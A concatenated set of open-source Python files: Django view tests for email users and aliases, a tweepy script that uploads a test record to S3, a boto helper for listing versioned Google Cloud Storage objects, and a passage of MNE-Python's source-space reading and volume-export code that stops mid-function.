self.assertIn(self.alias.username.get_absolute_url(), response.url)
def test_aliasdetails_via_good_post_no_pk(self):
response = self.client.post(
reverse('emailalias.new'),
{
# 'pk': self.alias.pk,
'username': self.user.pk,
'email_domain': self.domain.pk,
'alias_name': 'alias_name',
'state': 'E'
},
)
self.assertEqual(response.status_code, 302)
self.assertIn(self.alias.username.get_absolute_url(), response.url)
def test_aliasdetails_via_good_post_via_userdetails(self):
response = self.client.post(
reverse('emailuser.details', kwargs={'pk': self.user.pk}),
{
'pk': self.alias.pk,
'username': self.user.pk,
'email_domain': self.domain.pk,
'alias_name': 'new_alias_name_via_post',
'state': 'E'
},
)
self.assertEqual(response.status_code, 200)
def test_userdetails_via_post(self):
response = self.client.post(
reverse('emailuser.details', kwargs={'pk': self.user.pk}),
{}
)
self.assertEqual(response.status_code, 200)
def test_userdetails_via_post_bad_pk(self):
response = self.client.post(
reverse('emailuser.details', kwargs={'pk': 10000}),
{}
)
self.assertEqual(response.status_code, 302)
self.assertIn(reverse('index'), response.url)
def test_userdetails_via_post_good_pk(self):
response = self.client.post(
reverse('emailuser.details', kwargs={'pk': self.user.pk}),
)
self.assertEqual(response.status_code, 200)
def test_userdetails_via_post_good_form(self):
response = self.client.post(
reverse('emailuser.details', kwargs={'pk': self.user.pk}),
{
'pk': self.user.pk,
'username': 'new_username_set_by_post',
'email_server': self.server.pk,
'full_name': 'new_fullname_set_by_post',
'state': 'E'
}
)
self.assertEqual(response.status_code, 302)
self.assertIn(self.user.get_absolute_url(), response.url)
def test_userdetails_via_post_bad_alias(self):
response = self.client.post(
reverse('emailuser.details', kwargs={'pk': self.user.pk}),
{
'alias_name': None,
}
)
self.assertEqual(response.status_code, 200)
def test_userdetails_via_post_good_form_to_user_user(self):
response = self.client.post(reverse('emailuser.new'), {
'username': 'new_username_set_by_post',
'email_server': self.server.pk,
'full_name': 'new_fullname_set_by_post',
'state': 'E'
}, follow=True)
# self.assertIn(EmailUser(pk=3).get_absolute_url(), response.path)
self.assertEqual(response.status_code, 200)
def test_userdetails_has_new_form(self):
response = self.client.get(reverse('emailuser.new'))
self.assertEqual(response.status_code, 200)
def test_emailuser_delete(self):
response = self.client.get(reverse('emailuser.delete',
kwargs={'pk': self.user.pk}))
self.assertEqual(response.status_code, 302)
self.assertIn(reverse('index'), response.url)
def test_emailuser_delete_missing_id(self):
response = self.client.get(reverse('emailuser.delete',
kwargs={'pk': 10000}))
self.assertEqual(response.status_code, 302)
self.assertIn(reverse('index'), response.url)
|
aashish24/tweepy
|
refs/heads/master
|
upload_record.py
|
6
|
import boto
from boto.s3.key import Key
from os import environ as env
conn = boto.connect_s3()
bucket = conn.get_bucket(env['AWS_BUCKET'])
k = bucket.get_key('record', validate=False)
k.set_contents_from_filename('tests/record.json')
k.set_acl('public-read')
k.close(fast=True)
|
aleonliao/depot_tools
|
refs/heads/master
|
third_party/boto/gs/bucketlistresultset.py
|
68
|
# Copyright 2012 Google Inc.
# Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
def versioned_bucket_lister(bucket, prefix='', delimiter='',
marker='', generation_marker='', headers=None):
"""
A generator function for listing versioned objects.
"""
more_results = True
k = None
while more_results:
rs = bucket.get_all_versions(prefix=prefix, marker=marker,
generation_marker=generation_marker,
delimiter=delimiter, headers=headers,
max_keys=999)
for k in rs:
yield k
marker = rs.next_marker
generation_marker = rs.next_generation_marker
        more_results = rs.is_truncated
class VersionedBucketListResultSet:
"""
    A resultset for listing versions within a bucket. Uses the
    versioned_bucket_lister generator function and implements the iterator
    interface. This
transparently handles the results paging from GCS so even if you have
many thousands of keys within the bucket you can iterate over all
keys in a reasonably efficient manner.
"""
def __init__(self, bucket=None, prefix='', delimiter='', marker='',
generation_marker='', headers=None):
self.bucket = bucket
self.prefix = prefix
self.delimiter = delimiter
self.marker = marker
self.generation_marker = generation_marker
self.headers = headers
def __iter__(self):
return versioned_bucket_lister(self.bucket, prefix=self.prefix,
delimiter=self.delimiter,
marker=self.marker,
generation_marker=self.generation_marker,
headers=self.headers)
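# Illustrative usage sketch (not part of the original module): iterating over
# all object versions under a prefix, where `bucket` is a previously opened
# GS bucket. Each yielded key corresponds to a single object generation, and
# paging is handled transparently by versioned_bucket_lister above.
#
#   for version in VersionedBucketListResultSet(bucket, prefix='logs/'):
#       print version.name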
|
bloyl/mne-python
|
refs/heads/placeholder
|
mne/source_space.py
|
4
|
# Authors: Matti Hämäläinen <msh@nmr.mgh.harvard.edu>
# Alexandre Gramfort <alexandre.gramfort@inria.fr>
#
# License: BSD (3-clause)
# Many of the computations in this code were derived from Matti Hämäläinen's
# C code.
from copy import deepcopy
from functools import partial
from gzip import GzipFile
import os
import os.path as op
import numpy as np
from .io.constants import FIFF
from .io.meas_info import create_info, Info, read_fiducials
from .io.tree import dir_tree_find
from .io.tag import find_tag, read_tag
from .io.open import fiff_open
from .io.write import (start_block, end_block, write_int,
write_float_sparse_rcs, write_string,
write_float_matrix, write_int_matrix,
write_coord_trans, start_file, end_file, write_id)
from .io.pick import channel_type, _picks_to_idx
from .bem import read_bem_surfaces
from .fixes import _get_img_fdata
from .surface import (read_surface, _create_surf_spacing, _get_ico_surface,
_tessellate_sphere_surf, _get_surf_neighbors,
_normalize_vectors, _triangle_neighbors, mesh_dist,
complete_surface_info, _compute_nearest, fast_cross_3d,
_CheckInside)
from .utils import (get_subjects_dir, check_fname, logger, verbose, fill_doc,
_ensure_int, check_version, _get_call_line, warn,
_check_fname, _check_path_like, _check_sphere,
_validate_type, _check_option, _is_numeric, _pl, _suggest,
object_size, sizeof_fmt)
from .parallel import parallel_func, check_n_jobs
from .transforms import (invert_transform, apply_trans, _print_coord_trans,
combine_transforms, _get_trans,
_coord_frame_name, Transform, _str_to_frame,
_ensure_trans, read_ras_mni_t)
def read_freesurfer_lut(fname=None):
"""Read a Freesurfer-formatted LUT.
Parameters
----------
fname : str | None
The filename. Can be None to read the standard Freesurfer LUT.
Returns
-------
atlas_ids : dict
Mapping from label names to IDs.
colors : dict
Mapping from label names to colors.
"""
lut = _get_lut(fname)
names, ids = lut['name'], lut['id']
colors = np.array([lut['R'], lut['G'], lut['B'], lut['A']], float).T
atlas_ids = dict(zip(names, ids))
colors = dict(zip(names, colors))
return atlas_ids, colors
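# Illustrative usage (not part of the original module): the mappings returned
# by read_freesurfer_lut can be used to look up the integer ID and RGBA color
# of a FreeSurfer label, e.g.
#
#     atlas_ids, colors = read_freesurfer_lut()
#     hippo_id = atlas_ids['Left-Hippocampus']     # an aseg label name
#     hippo_rgba = colors['Left-Hippocampus']
#
# The label name shown is just an example of an entry in the bundled LUT.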
def _get_lut(fname=None):
"""Get a FreeSurfer LUT."""
_validate_type(fname, ('path-like', None), 'fname')
if fname is None:
fname = op.join(op.dirname(__file__), 'data', 'FreeSurferColorLUT.txt')
_check_fname(fname, 'read', must_exist=True)
dtype = [('id', '<i8'), ('name', 'U'),
('R', '<i8'), ('G', '<i8'), ('B', '<i8'), ('A', '<i8')]
lut = {d[0]: list() for d in dtype}
with open(fname, 'r') as fid:
for line in fid:
line = line.strip()
if line.startswith('#') or not line:
continue
line = line.split()
if len(line) != len(dtype):
raise RuntimeError(f'LUT is improperly formatted: {fname}')
for d, part in zip(dtype, line):
lut[d[0]].append(part)
lut = {d[0]: np.array(lut[d[0]], dtype=d[1]) for d in dtype}
assert len(lut['name']) > 0
return lut
def _get_lut_id(lut, label):
"""Convert a label to a LUT ID number."""
assert isinstance(label, str)
mask = (lut['name'] == label)
assert mask.sum() == 1
return lut['id'][mask]
_src_kind_dict = {
'vol': 'volume',
'surf': 'surface',
'discrete': 'discrete',
}
class SourceSpaces(list):
"""Represent a list of source space.
Currently implemented as a list of dictionaries containing the source
space information
Parameters
----------
source_spaces : list
A list of dictionaries containing the source space information.
info : dict
Dictionary with information about the creation of the source space
file. Has keys 'working_dir' and 'command_line'.
Attributes
----------
info : dict
Dictionary with information about the creation of the source space
file. Has keys 'working_dir' and 'command_line'.
"""
def __init__(self, source_spaces, info=None): # noqa: D102
# First check the types is actually a valid config
_validate_type(source_spaces, list, 'source_spaces')
super(SourceSpaces, self).__init__(source_spaces) # list
self.kind # will raise an error if there is a problem
if info is None:
self.info = dict()
else:
self.info = dict(info)
@property
def kind(self):
types = list()
for si, s in enumerate(self):
_validate_type(s, dict, 'source_spaces[%d]' % (si,))
types.append(s.get('type', None))
_check_option('source_spaces[%d]["type"]' % (si,),
types[-1], ('surf', 'discrete', 'vol'))
if all(k == 'surf' for k in types[:2]):
surf_check = 2
if len(types) == 2:
kind = 'surface'
else:
kind = 'mixed'
else:
surf_check = 0
if all(k == 'discrete' for k in types):
kind = 'discrete'
else:
kind = 'volume'
if any(k == 'surf' for k in types[surf_check:]):
raise RuntimeError('Invalid source space with kinds %s' % (types,))
return kind
@verbose
def plot(self, head=False, brain=None, skull=None, subjects_dir=None,
trans=None, verbose=None):
"""Plot the source space.
Parameters
----------
head : bool
If True, show head surface.
brain : bool | str
If True, show the brain surfaces. Can also be a str for
surface type (e.g., 'pial', same as True). Default is None,
which means 'white' for surface source spaces and False otherwise.
skull : bool | str | list of str | list of dict | None
Whether to plot skull surface. If string, common choices would be
'inner_skull', or 'outer_skull'. Can also be a list to plot
multiple skull surfaces. If a list of dicts, each dict must
contain the complete surface info (such as you get from
:func:`mne.make_bem_model`). True is an alias of 'outer_skull'.
The subjects bem and bem/flash folders are searched for the 'surf'
files. Defaults to None, which is False for surface source spaces,
and True otherwise.
subjects_dir : str | None
Path to SUBJECTS_DIR if it is not set in the environment.
trans : str | 'auto' | dict | None
The full path to the head<->MRI transform ``*-trans.fif`` file
produced during coregistration. If trans is None, an identity
matrix is assumed. This is only needed when the source space is in
head coordinates.
%(verbose_meth)s
Returns
-------
fig : instance of mayavi.mlab.Figure
The figure.
"""
from .viz import plot_alignment
surfaces = list()
bem = None
if brain is None:
brain = 'white' if any(ss['type'] == 'surf'
for ss in self) else False
if isinstance(brain, str):
surfaces.append(brain)
elif brain:
surfaces.append('brain')
if skull is None:
skull = False if self.kind == 'surface' else True
if isinstance(skull, str):
surfaces.append(skull)
elif skull is True:
surfaces.append('outer_skull')
elif skull is not False: # list
if isinstance(skull[0], dict): # bem
skull_map = {FIFF.FIFFV_BEM_SURF_ID_BRAIN: 'inner_skull',
FIFF.FIFFV_BEM_SURF_ID_SKULL: 'outer_skull',
FIFF.FIFFV_BEM_SURF_ID_HEAD: 'outer_skin'}
for this_skull in skull:
surfaces.append(skull_map[this_skull['id']])
bem = skull
else: # list of str
for surf in skull:
surfaces.append(surf)
if head:
surfaces.append('head')
if self[0]['coord_frame'] == FIFF.FIFFV_COORD_HEAD:
coord_frame = 'head'
if trans is None:
raise ValueError('Source space is in head coordinates, but no '
'head<->MRI transform was given. Please '
'specify the full path to the appropriate '
'*-trans.fif file as the "trans" parameter.')
else:
coord_frame = 'mri'
info = create_info(0, 1000., 'eeg')
return plot_alignment(
info, trans=trans, subject=self._subject,
subjects_dir=subjects_dir, surfaces=surfaces,
coord_frame=coord_frame, meg=(), eeg=False, dig=False, ecog=False,
bem=bem, src=self
)
def __getitem__(self, *args, **kwargs):
"""Get an item."""
out = super().__getitem__(*args, **kwargs)
if isinstance(out, list):
out = SourceSpaces(out)
return out
def __repr__(self): # noqa: D105
ss_repr = []
extra = []
for si, ss in enumerate(self):
ss_type = ss['type']
r = _src_kind_dict[ss_type]
if ss_type == 'vol':
if 'seg_name' in ss:
r += " (%s)" % (ss['seg_name'],)
else:
r += ", shape=%s" % (ss['shape'],)
elif ss_type == 'surf':
r += (" (%s), n_vertices=%i" % (_get_hemi(ss)[0], ss['np']))
r += ', n_used=%i' % (ss['nuse'],)
if si == 0:
extra += ['%s coords'
% (_coord_frame_name(int(ss['coord_frame'])))]
ss_repr.append('<%s>' % r)
subj = self._subject
if subj is not None:
extra += ['subject %r' % (subj,)]
sz = object_size(self)
if sz is not None:
extra += [f'~{sizeof_fmt(sz)}']
return "<SourceSpaces: [%s] %s>" % (
', '.join(ss_repr), ', '.join(extra))
@property
def _subject(self):
return self[0].get('subject_his_id', None)
def __add__(self, other):
"""Combine source spaces."""
out = self.copy()
out += other
return SourceSpaces(out)
def copy(self):
"""Make a copy of the source spaces.
Returns
-------
src : instance of SourceSpaces
The copied source spaces.
"""
return deepcopy(self)
def __deepcopy__(self, memodict):
"""Make a deepcopy."""
# don't copy read-only views (saves a ton of mem for split-vol src)
info = deepcopy(self.info, memodict)
ss = list()
for s in self:
for key in ('rr', 'nn'):
if key in s:
arr = s[key]
id_ = id(arr)
if id_ not in memodict:
if not arr.flags.writeable:
memodict[id_] = arr
ss.append(deepcopy(s, memodict))
return SourceSpaces(ss, info)
@verbose
def save(self, fname, overwrite=False, *, verbose=None):
"""Save the source spaces to a fif file.
Parameters
----------
fname : str
File to write.
%(overwrite)s
%(verbose_meth)s
"""
write_source_spaces(fname, self, overwrite)
@verbose
def export_volume(self, fname, include_surfaces=True,
include_discrete=True, dest='mri', trans=None,
mri_resolution=False, use_lut=True, overwrite=False,
verbose=None):
"""Export source spaces to nifti or mgz file.
Parameters
----------
fname : str
Name of nifti or mgz file to write.
include_surfaces : bool
If True, include surface source spaces.
include_discrete : bool
If True, include discrete source spaces.
dest : 'mri' | 'surf'
If 'mri' the volume is defined in the coordinate system of the
original T1 image. If 'surf' the coordinate system of the
FreeSurfer surface is used (Surface RAS).
trans : dict, str, or None
Either a transformation filename (usually made using mne_analyze)
or an info dict (usually opened using read_trans()). If string, an
ending of ``.fif`` or ``.fif.gz`` will be assumed to be in FIF
format, any other ending will be assumed to be a text file with a
            4x4 transformation matrix (like the ``--trans`` MNE-C option).
Must be provided if source spaces are in head coordinates and
include_surfaces and mri_resolution are True.
mri_resolution : bool | str
If True, the image is saved in MRI resolution
(e.g. 256 x 256 x 256), and each source region (surface or
segmentation volume) filled in completely. If "sparse", only a
single voxel in the high-resolution MRI is filled in for each
source point.
.. versionchanged:: 0.21.0
Support for "sparse" was added.
use_lut : bool
If True, assigns a numeric value to each source space that
corresponds to a color on the freesurfer lookup table.
%(overwrite)s
.. versionadded:: 0.19
%(verbose_meth)s
Notes
-----
This method requires nibabel.
"""
_check_fname(fname, overwrite)
_validate_type(mri_resolution, (bool, str), 'mri_resolution')
if isinstance(mri_resolution, str):
_check_option('mri_resolution', mri_resolution, ["sparse"],
extra='when mri_resolution is a string')
else:
mri_resolution = bool(mri_resolution)
fname = str(fname)
# import nibabel or raise error
try:
import nibabel as nib
except ImportError:
raise ImportError('This function requires nibabel.')
# Check coordinate frames of each source space
coord_frames = np.array([s['coord_frame'] for s in self])
# Raise error if trans is not provided when head coordinates are used
# and mri_resolution and include_surfaces are true
if (coord_frames == FIFF.FIFFV_COORD_HEAD).all():
coords = 'head' # all sources in head coordinates
if mri_resolution and include_surfaces:
if trans is None:
raise ValueError('trans containing mri to head transform '
'must be provided if mri_resolution and '
'include_surfaces are true and surfaces '
'are in head coordinates')
elif trans is not None:
logger.info('trans is not needed and will not be used unless '
'include_surfaces and mri_resolution are True.')
elif (coord_frames == FIFF.FIFFV_COORD_MRI).all():
coords = 'mri' # all sources in mri coordinates
if trans is not None:
logger.info('trans is not needed and will not be used unless '
'sources are in head coordinates.')
# Raise error if all sources are not in the same space, or sources are
# not in mri or head coordinates
else:
raise ValueError('All sources must be in head coordinates or all '
'sources must be in mri coordinates.')
# use lookup table to assign values to source spaces
logger.info('Reading FreeSurfer lookup table')
# read the lookup table
lut = _get_lut()
# Setup a dictionary of source types
src_types = dict(volume=[], surface_discrete=[])
# Populate dictionary of source types
for src in self:
# volume sources
if src['type'] == 'vol':
src_types['volume'].append(src)
# surface and discrete sources
elif src['type'] in ('surf', 'discrete'):
src_types['surface_discrete'].append(src)
else:
raise ValueError('Unrecognized source type: %s.' % src['type'])
# Raise error if there are no volume source spaces
if len(src_types['volume']) == 0:
raise ValueError('Source spaces must contain at least one volume.')
# Get shape, inuse array and interpolation matrix from volume sources
src = src_types['volume'][0]
aseg_data = None
if mri_resolution:
# read the mri file used to generate volumes
if mri_resolution is True:
aseg_data = _get_img_fdata(nib.load(src['mri_file']))
# get the voxel space shape
shape3d = (src['mri_width'], src['mri_depth'],
src['mri_height'])
else:
# get the volume source space shape
# read the shape in reverse order
# (otherwise results are scrambled)
shape3d = src['shape']
# calculate affine transform for image (MRI_VOXEL to RAS)
if mri_resolution:
# MRI_VOXEL to MRI transform
transform = src['vox_mri_t']
else:
# MRI_VOXEL to MRI transform
# NOTE: 'src' indicates downsampled version of MRI_VOXEL
transform = src['src_mri_t']
        # Figure out how to get from our input source space to output voxels
        fro_dst_t = invert_transform(transform)
        # use a separate name so the ``dest`` parameter is not shadowed below
        dest_frame = transform['to']
        if coords == 'head':
            head_mri_t = _get_trans(trans, 'head', 'mri')[0]
            fro_dst_t = combine_transforms(head_mri_t, fro_dst_t, 'head',
                                           dest_frame)
# Fill in the volumes
img = np.zeros(shape3d)
for ii, vs in enumerate(src_types['volume']):
# read the lookup table value for segmented volume
if 'seg_name' not in vs:
raise ValueError('Volume sources should be segments, '
'not the entire volume.')
# find the color value for this volume
use_id = 1.
if mri_resolution is True or use_lut:
id_ = _get_lut_id(lut, vs['seg_name'])
if use_lut:
use_id = id_
if mri_resolution == 'sparse':
idx = apply_trans(fro_dst_t, vs['rr'][vs['vertno']])
idx = tuple(idx.round().astype(int).T)
elif mri_resolution is True: # fill the represented vol
# get the values for this volume
idx = (aseg_data == id_)
else:
assert mri_resolution is False
idx = vs['inuse'].reshape(shape3d, order='F').astype(bool)
img[idx] = use_id
# loop through the surface and discrete source spaces
        # get the surface names (assumes left, right order; may want
        # to add these names during source space generation)
for src in src_types['surface_discrete']:
val = 1
if src['type'] == 'surf':
if not include_surfaces:
continue
if use_lut:
surf_name = {
FIFF.FIFFV_MNE_SURF_LEFT_HEMI: 'Left',
FIFF.FIFFV_MNE_SURF_RIGHT_HEMI: 'Right',
}[src['id']] + '-Cerebral-Cortex'
val = _get_lut_id(lut, surf_name)
else:
assert src['type'] == 'discrete'
if not include_discrete:
continue
if use_lut:
logger.info('Discrete sources do not have values on '
'the lookup table. Defaulting to 1.')
# convert vertex positions from their native space
# (either HEAD or MRI) to MRI_VOXEL space
if mri_resolution is True:
use_rr = src['rr']
else:
assert mri_resolution is False or mri_resolution == 'sparse'
use_rr = src['rr'][src['vertno']]
srf_vox = apply_trans(fro_dst_t['trans'], use_rr)
# convert to numeric indices
ix_, iy_, iz_ = srf_vox.T.round().astype(int)
# clip indices outside of volume space
            ix = np.clip(ix_, 0, shape3d[0] - 1)
iy = np.clip(iy_, 0, shape3d[1] - 1)
iz = np.clip(iz_, 0, shape3d[2] - 1)
# compare original and clipped indices
n_diff = ((ix_ != ix) | (iy_ != iy) | (iz_ != iz)).sum()
# generate use warnings for clipping
if n_diff > 0:
warn(f'{n_diff} {src["type"]} vertices lay outside of volume '
f'space. Consider using a larger volume space.')
# get surface id or use default value
# update image to include surface voxels
img[ix, iy, iz] = val
if dest == 'mri':
# combine with MRI to RAS transform
transform = combine_transforms(
transform, vs['mri_ras_t'],
transform['from'], vs['mri_ras_t']['to'])
# now setup the affine for volume image
affine = transform['trans'].copy()
# make sure affine converts from m to mm
affine[:3] *= 1e3
# setup image for file
        if fname.endswith(('.nii', '.nii.gz')):  # save as nifti
# setup the nifti header
hdr = nib.Nifti1Header()
hdr.set_xyzt_units('mm')
# save the nifti image
img = nib.Nifti1Image(img, affine, header=hdr)
elif fname.endswith('.mgz'): # save as mgh
# convert to float32 (float64 not currently supported)
img = img.astype('float32')
# save the mgh image
img = nib.freesurfer.mghformat.MGHImage(img, affine)
else:
            raise ValueError('Unrecognized file extension')
# write image to file
nib.save(img, fname)
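# Illustrative sketch (not part of the module API): one way ``export_volume``
# could be called. File names are hypothetical placeholders, and the source
# space is assumed to contain at least one volume source space.
def _example_export_volume():
    src = read_source_spaces('sample-vol-src.fif')  # hypothetical file
    # Writing at MRI resolution requires nibabel; if the sources were in head
    # coordinates, a ``trans`` file would also be needed.
    src.export_volume('sample-src.nii.gz', mri_resolution=True, use_lut=True,
                      overwrite=True)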
def _add_patch_info(s):
"""Patch information in a source space.
Generate the patch information from the 'nearest' vector in
a source space. For vertex in the source space it provides
the list of neighboring vertices in the high resolution
triangulation.
Parameters
----------
s : dict
The source space.
"""
nearest = s['nearest']
if nearest is None:
s['pinfo'] = None
s['patch_inds'] = None
return
logger.info(' Computing patch statistics...')
indn = np.argsort(nearest)
nearest_sorted = nearest[indn]
steps = np.where(nearest_sorted[1:] != nearest_sorted[:-1])[0] + 1
starti = np.r_[[0], steps]
stopi = np.r_[steps, [len(nearest)]]
pinfo = list()
for start, stop in zip(starti, stopi):
pinfo.append(np.sort(indn[start:stop]))
s['pinfo'] = pinfo
# compute patch indices of the in-use source space vertices
patch_verts = nearest_sorted[steps - 1]
s['patch_inds'] = np.searchsorted(patch_verts, s['vertno'])
logger.info(' Patch information added...')
@verbose
def _read_source_spaces_from_tree(fid, tree, patch_stats=False, verbose=None):
"""Read the source spaces from a FIF file.
Parameters
----------
fid : file descriptor
An open file descriptor.
tree : dict
The FIF tree structure if source is a file id.
patch_stats : bool, optional (default False)
Calculate and add cortical patch statistics to the surfaces.
%(verbose)s
Returns
-------
src : SourceSpaces
The source spaces.
"""
# Find all source spaces
spaces = dir_tree_find(tree, FIFF.FIFFB_MNE_SOURCE_SPACE)
if len(spaces) == 0:
raise ValueError('No source spaces found')
src = list()
for s in spaces:
logger.info(' Reading a source space...')
this = _read_one_source_space(fid, s)
logger.info(' [done]')
if patch_stats:
_complete_source_space_info(this)
src.append(this)
logger.info(' %d source spaces read' % len(spaces))
return SourceSpaces(src)
@verbose
def read_source_spaces(fname, patch_stats=False, verbose=None):
"""Read the source spaces from a FIF file.
Parameters
----------
fname : str
The name of the file, which should end with -src.fif or
-src.fif.gz.
patch_stats : bool, optional (default False)
Calculate and add cortical patch statistics to the surfaces.
%(verbose)s
Returns
-------
src : SourceSpaces
The source spaces.
See Also
--------
write_source_spaces, setup_source_space, setup_volume_source_space
"""
# be more permissive on read than write (fwd/inv can contain src)
check_fname(fname, 'source space', ('-src.fif', '-src.fif.gz',
'_src.fif', '_src.fif.gz',
'-fwd.fif', '-fwd.fif.gz',
'_fwd.fif', '_fwd.fif.gz',
'-inv.fif', '-inv.fif.gz',
'_inv.fif', '_inv.fif.gz'))
ff, tree, _ = fiff_open(fname)
with ff as fid:
src = _read_source_spaces_from_tree(fid, tree, patch_stats=patch_stats,
verbose=verbose)
src.info['fname'] = fname
node = dir_tree_find(tree, FIFF.FIFFB_MNE_ENV)
if node:
node = node[0]
for p in range(node['nent']):
kind = node['directory'][p].kind
pos = node['directory'][p].pos
tag = read_tag(fid, pos)
if kind == FIFF.FIFF_MNE_ENV_WORKING_DIR:
src.info['working_dir'] = tag.data
elif kind == FIFF.FIFF_MNE_ENV_COMMAND_LINE:
src.info['command_line'] = tag.data
return src
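# Illustrative sketch (hypothetical file name): reading a source space file
# and inspecting a few of the fields documented above.
def _example_read_source_spaces():
    src = read_source_spaces('sample-oct6-src.fif')  # hypothetical path
    for s in src:
        print(s['type'], '%d of %d vertices in use' % (s['nuse'], s['np']))
    return src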
def _read_one_source_space(fid, this):
"""Read one source space."""
res = dict()
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_ID)
if tag is None:
res['id'] = int(FIFF.FIFFV_MNE_SURF_UNKNOWN)
else:
res['id'] = int(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_TYPE)
if tag is None:
raise ValueError('Unknown source space type')
else:
src_type = int(tag.data)
if src_type == FIFF.FIFFV_MNE_SPACE_SURFACE:
res['type'] = 'surf'
elif src_type == FIFF.FIFFV_MNE_SPACE_VOLUME:
res['type'] = 'vol'
elif src_type == FIFF.FIFFV_MNE_SPACE_DISCRETE:
res['type'] = 'discrete'
else:
raise ValueError('Unknown source space type (%d)' % src_type)
if res['type'] == 'vol':
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_VOXEL_DIMS)
if tag is not None:
res['shape'] = tuple(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_COORD_TRANS)
if tag is not None:
res['src_mri_t'] = tag.data
parent_mri = dir_tree_find(this, FIFF.FIFFB_MNE_PARENT_MRI_FILE)
if len(parent_mri) == 0:
# MNE 2.7.3 (and earlier) didn't store necessary information
# about volume coordinate translations. Although there is a
# FFIF_COORD_TRANS in the higher level of the FIFF file, this
# doesn't contain all the info we need. Safer to return an
# error unless a user really wants us to add backward compat.
raise ValueError('Can not find parent MRI location. The volume '
'source space may have been made with an MNE '
'version that is too old (<= 2.7.3). Consider '
'updating and regenerating the inverse.')
mri = parent_mri[0]
for d in mri['directory']:
if d.kind == FIFF.FIFF_COORD_TRANS:
tag = read_tag(fid, d.pos)
trans = tag.data
if trans['from'] == FIFF.FIFFV_MNE_COORD_MRI_VOXEL:
res['vox_mri_t'] = tag.data
if trans['to'] == FIFF.FIFFV_MNE_COORD_RAS:
res['mri_ras_t'] = tag.data
tag = find_tag(fid, mri, FIFF.FIFF_MNE_SOURCE_SPACE_INTERPOLATOR)
if tag is not None:
res['interpolator'] = tag.data
if tag.data.data.size == 0:
del res['interpolator']
else:
logger.info("Interpolation matrix for MRI not found.")
tag = find_tag(fid, mri, FIFF.FIFF_MNE_SOURCE_SPACE_MRI_FILE)
if tag is not None:
res['mri_file'] = tag.data
tag = find_tag(fid, mri, FIFF.FIFF_MRI_WIDTH)
if tag is not None:
res['mri_width'] = int(tag.data)
tag = find_tag(fid, mri, FIFF.FIFF_MRI_HEIGHT)
if tag is not None:
res['mri_height'] = int(tag.data)
tag = find_tag(fid, mri, FIFF.FIFF_MRI_DEPTH)
if tag is not None:
res['mri_depth'] = int(tag.data)
tag = find_tag(fid, mri, FIFF.FIFF_MNE_FILE_NAME)
if tag is not None:
res['mri_volume_name'] = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NNEIGHBORS)
if tag is not None:
nneighbors = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NEIGHBORS)
offset = 0
neighbors = []
for n in nneighbors:
neighbors.append(tag.data[offset:offset + n])
offset += n
res['neighbor_vert'] = neighbors
tag = find_tag(fid, this, FIFF.FIFF_COMMENT)
if tag is not None:
res['seg_name'] = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NPOINTS)
if tag is None:
raise ValueError('Number of vertices not found')
res['np'] = int(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_BEM_SURF_NTRI)
if tag is None:
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NTRI)
if tag is None:
res['ntri'] = 0
else:
res['ntri'] = int(tag.data)
else:
res['ntri'] = tag.data
tag = find_tag(fid, this, FIFF.FIFF_MNE_COORD_FRAME)
if tag is None:
raise ValueError('Coordinate frame information not found')
res['coord_frame'] = tag.data[0]
# Vertices, normals, and triangles
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_POINTS)
if tag is None:
raise ValueError('Vertex data not found')
res['rr'] = tag.data.astype(np.float64) # double precision for mayavi
if res['rr'].shape[0] != res['np']:
raise ValueError('Vertex information is incorrect')
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NORMALS)
if tag is None:
raise ValueError('Vertex normals not found')
res['nn'] = tag.data.copy()
if res['nn'].shape[0] != res['np']:
raise ValueError('Vertex normal information is incorrect')
if res['ntri'] > 0:
tag = find_tag(fid, this, FIFF.FIFF_BEM_SURF_TRIANGLES)
if tag is None:
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_TRIANGLES)
if tag is None:
raise ValueError('Triangulation not found')
else:
res['tris'] = tag.data - 1 # index start at 0 in Python
else:
res['tris'] = tag.data - 1 # index start at 0 in Python
if res['tris'].shape[0] != res['ntri']:
raise ValueError('Triangulation information is incorrect')
else:
res['tris'] = None
# Which vertices are active
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE)
if tag is None:
res['nuse'] = 0
res['inuse'] = np.zeros(res['nuse'], dtype=np.int64)
res['vertno'] = None
else:
res['nuse'] = int(tag.data)
tag = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_SELECTION)
if tag is None:
raise ValueError('Source selection information missing')
res['inuse'] = tag.data.astype(np.int64).T
if len(res['inuse']) != res['np']:
raise ValueError('Incorrect number of entries in source space '
'selection')
res['vertno'] = np.where(res['inuse'])[0]
# Use triangulation
tag1 = find_tag(fid, this, FIFF.FIFF_MNE_SOURCE_SPACE_NUSE_TRI)
